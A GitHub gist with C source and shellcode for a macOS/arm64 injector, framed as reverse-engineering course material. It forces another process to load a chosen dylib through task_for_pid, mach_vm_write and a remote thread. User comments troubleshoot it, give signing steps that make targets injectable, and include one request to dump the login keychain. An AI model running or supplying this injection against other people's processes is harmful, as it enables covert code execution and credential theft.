-
-
Save vocaeq/fbac63d5d36bc6e1d6d99df9c92f75dc to your computer and use it in GitHub Desktop.
#include <dlfcn.h> | |
#include <stdio.h> | |
#include <unistd.h> | |
#include <sys/types.h> | |
#include <mach/mach.h> | |
#include <mach/error.h> | |
#include <errno.h> | |
#include <stdlib.h> | |
#include <sys/sysctl.h> | |
#include <sys/mman.h> | |
#include <sys/stat.h> | |
#include <pthread.h> | |
#ifdef __arm64__ | |
//#include "mach/arm/thread_status.h" | |
// Apple says: mach/mach_vm.h:1:2: error: mach_vm.h unsupported | |
// And I say, bullshit. | |
kern_return_t mach_vm_allocate | |
( | |
vm_map_t target, | |
mach_vm_address_t *address, | |
mach_vm_size_t size, | |
int flags | |
); | |
kern_return_t mach_vm_write | |
( | |
vm_map_t target_task, | |
mach_vm_address_t address, | |
vm_offset_t data, | |
mach_msg_type_number_t dataCnt | |
); | |
#else | |
#include <mach/mach_vm.h> | |
#endif | |
#define STACK_SIZE 65536 | |
#define CODE_SIZE 128 | |
// | |
// Based on http://newosxbook.com/src.jl?tree=listings&file=inject.c | |
// Updated to work on Mojave by creating a stub mach thread that then | |
// creates a real pthread. Injected mach thread is terminated to clean | |
// up as well. | |
// | |
// Due to popular request: | |
// | |
// Simple injector example (and basis of coreruption tool). | |
// | |
// If you've looked into research on injection techniques in OS X, you | |
// probably know about mach_inject. This tool, part of Dino Dai Zovi's | |
// excellent "Mac Hacker's Handbook" (a must read - kudos, DDZ) was | |
// created to inject code in PPC and i386. Since I couldn't find anything | |
// for x86_64 or ARM, I ended up writing my own tool. | |
// Since, this tool has exploded in functionality - with many other features, | |
// including scriptable debugging, fault injection, function hooking, code | |
// decryption, and what not - which comes in *really* handy on iOS. | |
// | |
// coreruption is still closed source, due its highly.. uhm.. useful | |
// nature. But I'm making this sample free, and I have fully annotated this. | |
// The rest of the stuff you need is in Chapters 11 and 12 MOXiI 1, with more | |
// to come in the 2nd Ed (..in time for iOS 9 :-) | |
// | |
// Go forth and spread your code :-) | |
// | |
// J (info@newosxbook.com) 02/05/2014 | |
// | |
// v2: With ARM64 - 06/02/2015 NOTE - ONLY FOR **ARM64**, NOT ARM32! | |
// Get the full bundle at - http://NewOSXBook.com/files/injarm64.tar | |
// with sample dylib and with script to compile this neatly. | |
// | |
//********************************************************************** | |
// Note ARM code IS messy, and I left the addresses wide apart. That's | |
// intentional. Basic ARM64 assembly will enable you to tidy this up and | |
// make the code more compact. | |
// | |
// This is *not* meant to be neat - I'm just preparing this for TG's | |
// upcoming OS X/iOS RE course (http://technologeeks.com/OSXRE) and thought | |
// this would be interesting to share. See you all in MOXiI 2nd Ed! | |
//********************************************************************** | |
// This sample code calls pthread_set_self to promote the injected thread | |
// to a pthread first - otherwise dlopen and many other calls (which rely | |
// on pthread_self()) will crash. | |
// It then calls dlopen() to load the library specified - which will trigger | |
// the library's constructor (q.e.d as far as code injection is concerned) | |
// and sleep for a long time. You can of course replace the sleep with | |
// another function, such as pthread_exit(), etc. | |
// | |
// (For the constructor, use: | |
// | |
// static void whicheverfunc() __attribute__((constructor)); | |
// | |
// in the library you inject) | |
// | |
// Note that the functions are shown here as "_PTHRDSS", "DLOPEN__" and "SLEEP___". | |
// Reason being, that the above are merely placeholders which will be patched with | |
// the runtime addresses when code is actually injected. | |
char injectedCode[] = | |
#ifdef X86_64 | |
// "\xCC" // int3 | |
"\x55" // push rbp | |
"\x48\x89\xE5" // mov rbp, rsp | |
"\x48\x83\xEC\x10" // sub rsp, 0x10 | |
"\x48\x8D\x7D\xF8" // lea rdi, qword [rbp+var_8] | |
"\x31\xC0" // xor eax, eax | |
"\x89\xC1" // mov ecx, eax | |
"\x48\x8D\x15\x21\x00\x00\x00" // lea rdx, qword ptr [rip + 0x21] | |
"\x48\x89\xCE" // mov rsi, rcx | |
"\x48\xB8" // movabs rax, pthread_create_from_mach_thread | |
"PTHRDCRT" | |
"\xFF\xD0" // call rax | |
"\x89\x45\xF4" // mov dword [rbp+var_C], eax | |
"\x48\x83\xC4\x10" // add rsp, 0x10 | |
"\x5D" // pop rbp | |
"\x48\xc7\xc0\x13\x0d\x00\x00" // mov rax, 0xD13 | |
"\xEB\xFE" // jmp 0x0 | |
"\xC3" // ret | |
"\x55" // push rbp | |
"\x48\x89\xE5" // mov rbp, rsp | |
"\x48\x83\xEC\x10" // sub rsp, 0x10 | |
"\xBE\x01\x00\x00\x00" // mov esi, 0x1 | |
"\x48\x89\x7D\xF8" // mov qword [rbp+var_8], rdi | |
"\x48\x8D\x3D\x1D\x00\x00\x00" // lea rdi, qword ptr [rip + 0x2c] | |
"\x48\xB8" // movabs rax, dlopen | |
"DLOPEN__" | |
"\xFF\xD0" // call rax | |
"\x31\xF6" // xor esi, esi | |
"\x89\xF7" // mov edi, esi | |
"\x48\x89\x45\xF0" // mov qword [rbp+var_10], rax | |
"\x48\x89\xF8" // mov rax, rdi | |
"\x48\x83\xC4\x10" // add rsp, 0x10 | |
"\x5D" // pop rbp | |
"\xC3" // ret | |
"LIBLIBLIBLIB" | |
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" | |
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" | |
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" | |
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; | |
#else | |
//"\x20\x8e\x38\xd4" //brk #0xc471 | |
"\xe0\x03\x00\x91\x00\x40\x00\xd1\xe1\x03\x1f\xaa\xe3\x03\x1f\xaa\xc4\x00\x00\x10\x62\x01\x00\x10\x85\x00\x40\xf9\xa0\x00\x3f\xd6\x07\x00\x00\x10\xe0\x00\x1f\xd6\x50\x54\x48\x52\x44\x43\x52\x54\x44\x4c\x4f\x50\x45\x4e\x5f\x5f\x50\x54\x48\x52\x44\x45\x58\x54\x21\x00\x80\xd2\xc0\x00\x00\x10\x47\xff\xff\x10\xe8\x00\x40\xf9\x00\x01\x3f\xd6\x67\xfe\xff\x10\xe0\x00\x1f\xd6\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42\x4c\x49\x42"; | |
/* | |
Compile: as shellcode.asm -o shellcode.o && ld ./shellcode.o -o shellcode -lSystem -syslibroot `xcrun -sdk macosx --show-sdk-path` | |
.global _main | |
.align 4 | |
_main: | |
mov x0, sp | |
sub x0, x0, #16 | |
mov x1, xzr | |
mov x3, xzr | |
adr x4, pthrdcrt | |
adr x2, _thread | |
ldr x5, [x4] | |
blr x5 | |
_loop: | |
adr x7, _loop | |
br x7 | |
pthrdcrt: .ascii "PTHRDCRT" | |
dlllopen: .ascii "DLOPEN__" | |
pthrdext: .ascii "PTHRDEXT" | |
_thread: | |
mov x1, #1 | |
adr x0, lib | |
adr x7, dlllopen | |
ldr x8, [x7] | |
blr x8 | |
adr x7, _loop | |
br x7 | |
lib: .ascii "LIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIB" | |
*/ | |
#endif | |
int inject(pid_t pid, const char *lib) | |
{ | |
task_t remoteTask; | |
struct stat buf; | |
/** | |
* First, check we have the library. Otherwise, we won't be able to inject.. | |
*/ | |
int rc = stat(lib, &buf); | |
if (rc != 0) { | |
fprintf(stderr, "Unable to open library file %s (%s) - Cannot inject\n", lib, strerror(errno)); | |
//return (-9); | |
} | |
mach_error_t kr = 0; | |
/** | |
* Second - the critical part - we need task_for_pid in order to get the task port of the target | |
* pid. This is our do-or-die: If we get the port, we can do *ANYTHING* we want. If we don't, we're | |
* #$%#$%. | |
* | |
* In iOS, this will require the task_for_pid-allow entitlement. In OS X, this will require getting past | |
* taskgated, but root access suffices for that. | |
* | |
*/ | |
kr = task_for_pid(mach_task_self(), pid, &remoteTask); | |
if (kr != KERN_SUCCESS) { | |
fprintf(stderr, "Unable to call task_for_pid on pid %d: %s. Cannot continue!\n", pid, mach_error_string(kr)); | |
return (-1); | |
} | |
/** | |
* From here on, it's pretty much straightforward - | |
* Allocate stack and code. We don't really care *where* they get allocated. Just that they get allocated. | |
* So, first, stack: | |
*/ | |
mach_vm_address_t remoteStack64 = (vm_address_t)NULL; | |
mach_vm_address_t remoteCode64 = (vm_address_t)NULL; | |
kr = mach_vm_allocate(remoteTask, &remoteStack64, STACK_SIZE, VM_FLAGS_ANYWHERE); | |
if (kr != KERN_SUCCESS) { | |
fprintf(stderr, "Unable to allocate memory for remote stack in thread: Error %s\n", mach_error_string(kr)); | |
return (-2); | |
} | |
else { | |
fprintf(stderr, "Allocated remote stack @0x%llx\n", remoteStack64); | |
} | |
/** | |
* Then we allocate the memory for the thread | |
*/ | |
remoteCode64 = (vm_address_t)NULL; | |
kr = mach_vm_allocate(remoteTask, &remoteCode64, CODE_SIZE, VM_FLAGS_ANYWHERE); | |
if (kr != KERN_SUCCESS) { | |
fprintf(stderr, "Unable to allocate memory for remote code in thread: Error %s\n", mach_error_string(kr)); | |
return (-2); | |
} | |
/** | |
* Patch code before injecting: That is, insert correct function addresses (and lib name) into placeholders | |
* | |
* Since we use the same shared library cache as our victim, meaning we can use memory addresses from | |
* OUR address space when we inject.. | |
*/ | |
int i = 0; | |
char *possiblePatchLocation = (injectedCode); | |
for (i = 0; i < 0x100; i++) { | |
// Patching is crude, but works. | |
// | |
extern void *_pthread_set_self; | |
possiblePatchLocation++; | |
uint64_t addrOfPthreadCreate = (uint64_t)dlsym(RTLD_DEFAULT, "pthread_create_from_mach_thread"); | |
uint64_t addrOfPthreadExit = (uint64_t)dlsym(RTLD_DEFAULT, "pthread_exit"); | |
uint64_t addrOfDlopen = (uint64_t)dlopen; | |
if (memcmp(possiblePatchLocation, "PTHRDCRT", 8) == 0) { | |
printf("pthread_create_from_mach_thread @%llx\n", addrOfPthreadCreate); | |
memcpy(possiblePatchLocation, &addrOfPthreadCreate, 8); | |
} | |
if (memcmp(possiblePatchLocation, "PTHRDEXT", 8) == 0) { | |
printf("pthread_exit @%llx\n", addrOfPthreadExit); | |
memcpy(possiblePatchLocation, &addrOfPthreadCreate, 8); | |
} | |
if (memcmp(possiblePatchLocation, "DLOPEN__", 6) == 0) { | |
printf("dlopen @%llx\n", addrOfDlopen); | |
memcpy(possiblePatchLocation, &addrOfDlopen, sizeof(uint64_t)); | |
} | |
if (memcmp(possiblePatchLocation, "LIBLIBLIB", 9) == 0) { | |
strcpy(possiblePatchLocation, lib); | |
} | |
} | |
/** | |
* Write the (now patched) code | |
*/ | |
kr = mach_vm_write(remoteTask, // Task port | |
remoteCode64, // Virtual Address (Destination) | |
(vm_address_t)injectedCode, // Source | |
sizeof(injectedCode)); // Length of the source | |
if (kr != KERN_SUCCESS) { | |
fprintf(stderr, "Unable to write remote thread memory: Error %s\n", mach_error_string(kr)); | |
return (-3); | |
} | |
/* | |
* Mark code as executable - This also requires a workaround on iOS, btw. | |
*/ | |
kr = vm_protect(remoteTask, remoteCode64, sizeof(injectedCode), FALSE, VM_PROT_READ | VM_PROT_EXECUTE); | |
/* | |
* Mark stack as writable - not really necessary | |
*/ | |
kr = vm_protect(remoteTask, remoteStack64, STACK_SIZE, TRUE, VM_PROT_READ | VM_PROT_WRITE); | |
if (kr != KERN_SUCCESS) { | |
fprintf(stderr, "Unable to set memory permissions for remote thread: Error %s\n", mach_error_string(kr)); | |
return (-4); | |
} | |
/* | |
* Create thread - This is obviously hardware specific. | |
*/ | |
#ifdef X86_64 | |
x86_thread_state64_t remoteThreadState64; | |
#else | |
// Using unified thread state for backporting to ARMv7, if anyone's interested.. | |
struct arm_unified_thread_state remoteThreadState64; | |
#endif | |
thread_act_t remoteThread; | |
memset(&remoteThreadState64, '\0', sizeof(remoteThreadState64) ); | |
remoteStack64 += (STACK_SIZE / 2); // this is the real stack | |
//remoteStack64 -= 8; // need alignment of 16 | |
const char* p = (const char*) remoteCode64; | |
#ifdef X86_64 | |
remoteThreadState64.__rip = (u_int64_t) (vm_address_t) remoteCode64; | |
// set remote Stack Pointer | |
remoteThreadState64.__rsp = (u_int64_t) remoteStack64; | |
remoteThreadState64.__rbp = (u_int64_t) remoteStack64; | |
#else | |
// Note the similarity - all we change are a couple of regs. | |
remoteThreadState64.ash.flavor = ARM_THREAD_STATE64; | |
remoteThreadState64.ash.count = ARM_THREAD_STATE64_COUNT; | |
remoteThreadState64.ts_64.__pc = (u_int64_t) remoteCode64; | |
remoteThreadState64.ts_64.__sp = (u_int64_t) remoteStack64; | |
// __uint64_t __x[29]; /* General purpose registers x0-x28 */ | |
#endif | |
printf ("Remote Stack 64 0x%llx, Remote code is %p\n", remoteStack64, p ); | |
/* | |
* create thread and launch it in one go | |
*/ | |
#ifdef X86_64 | |
kr = thread_create_running( remoteTask, x86_THREAD_STATE64, | |
(thread_state_t) &remoteThreadState64, x86_THREAD_STATE64_COUNT, &remoteThread ); | |
#else // __arm64__ | |
kr = thread_create_running( remoteTask, ARM_THREAD_STATE64, // ARM_THREAD_STATE64, | |
(thread_state_t) &remoteThreadState64.ts_64, ARM_THREAD_STATE64_COUNT , &remoteThread ); | |
#endif | |
if (kr != KERN_SUCCESS) { fprintf(stderr,"Unable to create remote thread: error %s", mach_error_string (kr)); | |
return (-3); } | |
return (0); | |
} | |
int main(int argc, const char *argv[]) | |
{ | |
if (argc < 3) { | |
fprintf(stderr, "Usage: %s _pid_ _action_\n", argv[0]); | |
fprintf(stderr, " _action_: path to a dylib on disk\n"); | |
exit(0); | |
} | |
pid_t pid = atoi(argv[1]); | |
const char *action = argv[2]; | |
struct stat buf; | |
int rc = stat(action, &buf); | |
if (rc == 0) { | |
inject(pid, action); | |
} | |
else { | |
fprintf(stderr, "Dylib not found\n"); | |
} | |
} |
@C0HERENCE I'm almost positive the shell code is for x86_64 processes and not arm64
@brandonros Nope. It's arm64
code and it's quite easy to verify that:
Compile:
clang inject.c -o inject
Check target architectures:
lipo -archs inject
arm64
Disassemble:
objdump -D inject
The disassembly of the __DATA
prints:
Disassembly of section __DATA,__data:
0000000100008000 <_injectedCode>:
100008000: e0 03 00 91 mov x0, sp
100008004: 00 40 00 d1 sub x0, x0, #16
100008008: e1 03 1f aa mov x1, xzr
10000800c: e3 03 1f aa mov x3, xzr
100008010: c4 00 00 10 adr x4, #24
100008014: 22 01 00 10 adr x2, #36
100008018: 85 00 40 f9 ldr x5, [x4]
10000801c: a0 00 3f d6 blr x5
100008020: 07 00 00 10 adr x7, #0
100008024: e0 00 1f d6 br x7
100008028: 50 54 48 52 <unknown>
10000802c: 44 43 52 54 b.mi 0x1000ac894 <_injectedCode+0xa4894>
100008030: 44 4c 4f 50 adr x4, #649610
100008034: 45 4e 5f 5f <unknown>
100008038: 21 00 80 d2 mov x1, #1
10000803c: 80 00 00 10 adr x0, #16
100008040: 87 ff ff 10 adr x7, #-16
100008044: e8 00 40 f9 ldr x8, [x7]
100008048: 00 01 3f d6 blr x8
10000804c: 4c 49 42 4c <unknown>
100008050: 49 42 4c 49 <unknown>
100008054: 42 4c 49 42 <unknown>
100008058: 4c 49 42 4c <unknown>
10000805c: 49 42 4c 49 <unknown>
100008060: 42 4c 49 42 <unknown>
100008064: 4c 49 42 4c <unknown>
100008068: 49 42 4c 49 <unknown>
10000806c: 42 4c 49 42 <unknown>
100008070: 4c 49 42 4c <unknown>
100008074: 49 42 4c 49 <unknown>
100008078: 42 4c 49 42 <unknown>
10000807c: 4c 49 42 4c <unknown>
100008080: 49 42 4c 49 <unknown>
100008084: 42 4c 49 42 <unknown>
100008088: 4c 49 42 4c <unknown>
10000808c: 49 42 4c 49 <unknown>
100008090: 42 4c 49 42 <unknown>
100008094: 4c 49 42 4c <unknown>
100008098: 49 42 4c 49 <unknown>
10000809c: 42 4c 49 42 <unknown>
1000080a0: 00 <unknown>
I tested this fork using an arm64 dylib and it worked fine.
i got Unable to call task_for_pid on pid 0: (os/kern) failure. Cannot continue!
on mac m1 11.2.1
dylib code
#include <stdio.h>
int main()
{
printf("hello, world!\n");
return 0;
}
@1337kingOf The command task_for_pid
requires elevated permissions. Run with as root (or with sudo
).
@1337kingOf The command
task_for_pid
requires elevated permissions. Run with as root (or withsudo
).
yeah im using sudo ofc
i still get
Unable to call task_for_pid on pid 37907: (os/kern) failure. Cannot continue!
Yeah, this code is arm64. I’ve ported the shellcode as an exercise for myself. I was tired and didn’t realize that I missed one part of shellcode and right after executing code, it does not close a thread if I remember correctly and just executes some garbage which is why the program crashes. Maybe one day I’ll find some time to fix it🤔
@vocaeq but my dylib cant run at all
and by the way maybe u know how to read login.keychain-db and dump all data ?
@1337kingOf @StarHack The requirements for app to be injectable on arm64 Mac's is:
- No hardened runtime on the binary we're injecting into
- Signed with get-task-allow entitlement
As long as those two requirements are fulfilled, you should not have problem to inject into the process. Just checked on my M1 on newest macOS and everything works just fine (beside crashing after code exec, but that's a different issue)
Edit: You don't need sudo.
@1337kingOf I got the same result. do u have resolved it?
@NeeSDev @1337kingOf @C0HERENCE I've just updated the code, so it won't crash. I've run some issues on closing thread, so i just put it in a loop, and it works. I don't have time for proper fix rn.
My first guess is that you've got task_for_pid on pid 37907: (os/kern) error is probably that either binary is signed with hardened-runtime or does not have get-task-allow entitlement.
Use this plit to sign binary: ldid -Sent.xml ./binary
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>com.apple.security.get-task-allow</key>
<true/>
</dict>
</plist>
Then it should work. Also try modifying your dylib into:
#include <stdio.h>
__attribute__((constructor))
static void testconstructor(int argc, const char **argv)
{
printf("Hello World");
}
hey @vocaeq , excellent work with adapting this to arm, I have tried your very simple printf dylib, and also one that writes into a file, but it seems the code is not executed at all.
I compile the injector with gcc and the dylib with gcc or g++, with the -dynamiclib flag. I see no errors or crashes, the app continues to run, but it doesn't seem like my code is executed.
Would you happen to know why could it be?
@Szustarol Did you debug your app in lldb
?
lldb yourapp
r
CTRL+C
thread backtrace all
c
Then run injector (sudo
or with privileged access).
CTRL+C
thread backtrace all
Did you see the new thread or is it missing altogether? We used a different implementation of this code in prouduction and it's working perfectly fine.
i test it on my M2 macbook pro, OS 12.5 (21G72), codes in the dylib executes successfully, but the victim process just crashed.
part of apples crash report are here